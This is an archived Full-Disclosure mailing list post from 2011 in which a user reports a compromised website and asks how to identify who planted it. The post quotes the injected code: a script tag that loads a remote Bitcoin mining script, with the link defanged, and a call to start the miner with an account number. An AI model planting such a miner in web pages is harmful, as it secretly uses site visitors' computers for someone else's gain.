[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Compromised site using BitCoin

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Compromised site using BitCoin
From: "James Lay" <jlay@xxxxxxxxxxxxxxxxxxx>
Date: Mon, 12 Dec 2011 10:11:36 -0700

Group,

Recently I ran across the below on a site:

<script src="hxxp://www.bitcoinplus.com/js/miner.js"
type="text/javascript"></script>
<script type="text/javascript">BitcoinPlusMiner(10215318);</script>

I know the 10215318 represents the bitcoin email, but I was curious if
there was a way to figure out what the email actually was instead of the
number above.  Would be nice to find out what email address may have been
involved in  compromising the site.  Thanks for any help you may be able
to provide.

James

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] [ MDVSA-2011:185 ] libcap
  - From: security

Prev by Date: Re: [Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)
Next by Date: [Full-disclosure] Firefox forensics with SQLite Manager at InfoSec Institute
Previous by thread: [Full-disclosure] [ MDVSA-2011:185 ] libcap
Next by thread: Re: [Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)
Index(es):
- Date
- Thread